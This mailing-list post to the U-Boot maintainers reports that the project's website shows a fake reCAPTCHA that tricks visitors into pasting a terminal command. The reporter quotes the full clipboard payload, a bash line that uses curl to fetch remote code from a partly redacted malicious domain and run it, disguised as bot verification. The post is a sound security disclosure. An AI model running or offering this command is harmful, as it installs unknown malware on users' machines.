U-boot.org is spreading malware
Mate Kukri
km at mkukri.xyz
Mon Feb 23 06:31:58 CET 2026
Dear Maintainers,
U-Boot.org <http://u-boot.org/> seems to be trying to social engineer visitors into executing potentially malicious code.
The website presents a seemingly fake re-Captcha upon visiting, which after ticking the box instructs the user to open their terminal and paste and execute a command from the clipboard for “verification".
Said command curl-s some text from a network server and runs it as a bash command.
I have not done much analysis on the exact behaviour of the payload, but social engineering users into executing arbitrary local payload is not an acceptable way of doing web visitor verification.
An example of the clipboard payload I am told to execute (but did not) is (sub XXXXXXXX with microzen)
/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"; echo ""BotGuard: Answer the protector challenge. Ref: 15978
Best regards,
Mate Kukri
More information about the U-Boot
mailing list